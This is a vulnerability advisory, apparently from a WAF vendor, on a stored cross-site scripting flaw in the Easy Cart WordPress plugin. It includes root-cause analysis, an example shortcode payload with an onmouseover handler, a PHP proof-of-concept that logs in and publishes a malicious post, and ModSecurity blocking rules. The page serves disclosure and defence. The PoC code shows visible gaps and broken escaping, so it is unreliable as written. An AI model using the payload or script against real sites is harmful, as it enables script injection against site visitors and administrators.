Published : June 2, 2026

CVE-2026-4080: Easy Cart <= 1.8 Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes PoC, Patch Analysis & Rule

CVE ID CVE-2026-4080
Plugin easy-cart
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.8
Patched Version
Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4080 (metadata-based):

The Easy Cart plugin for WordPress (version 1.8 and earlier) contains a stored cross-site scripting vulnerability in its ‘add_to_cart’ shortcode handler. Authenticated users with Contributor-level access or higher can inject arbitrary JavaScript into pages by exploiting insufficient output escaping on shortcode attributes.

The vulnerability carries a CVSS score of 6.4 (Medium severity) with a CWE-79 classification for improper neutralization of input during web page generation.

Root Cause: The vulnerability stems from the ectp_add_to_cart() function’s use of sanitize_text_field() on shortcode attributes such as ‘itemid’, ‘product_name’, ‘product_desc’, ‘product_qty’, and ‘price’.

Based on the CWE and description, sanitize_text_field() strips HTML tags but fails to escape double quote characters. When the filtered value is inserted into a double-quoted HTML attribute context.

), an attacker can break out of the attribute and inject event handlers like onmouseover or onload. This analysis is inferred from the CWE type and description. No code diff is available to confirm the exact vulnerable code path.nnExploitation: An attacker with Contributor-level access creates or edits a WordPress post or page and inserts the ‘[add_to_cart]’ shortcode with malicious attribute values. The payload targets the ‘itemid’ parameter: for example [add_to_cart itemid=”x” onmouseover=”alert(1)”]. When the page is rendered, the shortcode processor outputs: itemid=”x” onmouseover=”alert(1)” within an HTML attribute. This breaks the attribute boundary and injects a JavaScript event handler that triggers when a user hovers over the element. The attack vector is wp-admin/admin-ajax.php?action=easy_cart_action or the standard WordPress post editor. The description confirms that privileged authentication (Contributor+) is required.nnRemediation: The vendor should replace sanitize_text_field() with context-appropriate escaping functions. For shortcode attributes output within double-quoted HTML attributes, the fix must use esc_attr() on each attribute value. esc_attr() properly encodes double quotes to ” along with other special characters. For output in other contexts like JavaScript or inline CSS, use esc_js() or esc_attr() respectively. Since no patched version exists, users should uninstall or apply a WAF virtual patch until a proper fix is released.nnImpact: Successful exploitation enables attackers with authenticated Contributor access to inject malicious scripts into any page containing the vulnerable shortcode. When other users (including administrators) visit the compromised page, the injected scripts execute in their browser context. This can lead to session cookie theft, forced administrative actions (e.g., user creation, plugin installation), defacement, or redirection to malicious sites. The CVSS scope change (S:C) indicates the vulnerability affects resources beyond the vulnerable component, such as sensitive data access.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-4080 – Easy Cart $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$response = curl_exec($ch);nnif (strpos($response, ‘Dashboard’) === false && strpos($response, ‘wp-admin’) === false) {n die(“[!] Login failed. Check credentials or site URL.\n”);n}necho “[+] Successfully logged in as: $username\n”;nn// Step 2: Get a valid _wpnonce for creating a new post (admin-ajax.php nonce endpoint)n// We use the WordPress REST API or admin-ajax to create a post. For simplicity, we’ll use the REST API.n$rest_nonce_url = $target_url . ‘/wp-admin/admin-ajax.php?action=rest-nonce’;ncurl_setopt($ch, CURLOPT_URL, $rest_nonce_url);ncurl_setopt($ch, CURLOPT_POST, false);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);n$nonce_response = curl_exec($ch);nn// Check if nonce returned directly (old WordPress) or via JSONn$nonce = trim($nonce_response);nif (empty($nonce) || strlen($nonce) ‘CVE-2026-4080 PoC Test’,n ‘content’ => $post_content,n ‘status’ => ‘publish’,n ‘slug’ => ‘cve-2026-4080-poc-test-‘ . uniqid()n);nn$json_data = json_encode($post_data);ncurl_setopt($ch, CURLOPT_URL, $create_post_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/json’,n ‘X-WP-Nonce: ‘ . $noncen));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);n$post_response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);nnif ($http_code == 201) {n $post_data_response = json_decode($post_response, true);n $post_id = $post_data_response[‘id’];n $post_link = $post_data_response[‘link’];n echo “[+] Successfully created malicious post.\n”;n echo “[+] Post ID: $post_id\n”;n echo “[+] Visit: $post_link\n”;n echo “[+] Hover over the add-to-cart element to trigger the XSS payload.\n”;n} else {n echo “[!] Failed to create post. HTTP code: $http_code\n”;n echo “[!] Response: $post_response\n”;n echo “[!] Check if the REST API is enabled or if your user has proper permissions.\n”;n}nncurl_close($ch);necho “\n[+] PoC complete.\n”;n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-4080 (metadata-based)n# Block stored XSS via Easy Cart ‘add_to_cart’ shortcode by detecting double quote escape attempts in itemid parametern# This rule targets the request to create/update posts via the WordPress REST API or admin-ajaxnnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20264080,phase:2,deny,status:403,chain,msg:’CVE-2026-4080 Easy Cart Stored XSS via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-4080′,tag:’wordpress’,tag:’xss'”n SecRule ARGS_POST:action “@streq easy_cart_action” “chain”n SecRule ARGS_POST:itemid “@rx (?:%22|x22|\\x22|”)” \n “t:urlDecode,t:lowercase,chain”n SecRule MATCHED_VAR “@rx on[a-z]+=” “t:lowercase”nnSecRule REQUEST_URI “@beginsWith /wp-json/wp/v2/posts” \n “id:20264081,phase:2,deny,status:403,chain,msg:’CVE-2026-4080 Easy Cart Stored XSS via REST API’,severity:’CRITICAL’,tag:’CVE-2026-4080′,tag:’wordpress’,tag:’xss'”n SecRule REQUEST_HEADERS:Content-Type “@contains application/json” “chain”n SecRule REQUEST_BODY “@rx \\”itemid\\”\\s*:\\s*\\\”[^\”]*\\\”[^}]*on[a-z]+=” \n “t:jsonDecode,t:lowercase”nnSecRule REQUEST_URI “@streq /wp-admin/post.php” \n “id:20264082,phase:2,deny,status:403,chain,msg:’CVE-2026-4080 Easy Cart Stored XSS via Post Edit’,severity:’CRITICAL’,tag:’CVE-2026-4080′,tag:’wordpress’,tag:’xss'”n SecRule ARGS_POST:action “@streq editpost” “chain”n SecRule ARGS_POST:post_content “@rx \\[add_to_cart[^\]]*itemid=\\\”[^\”]*\\\”[^\]]*on[a-z]+=” \n “t:urlDecode,t:lowercase””
}

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School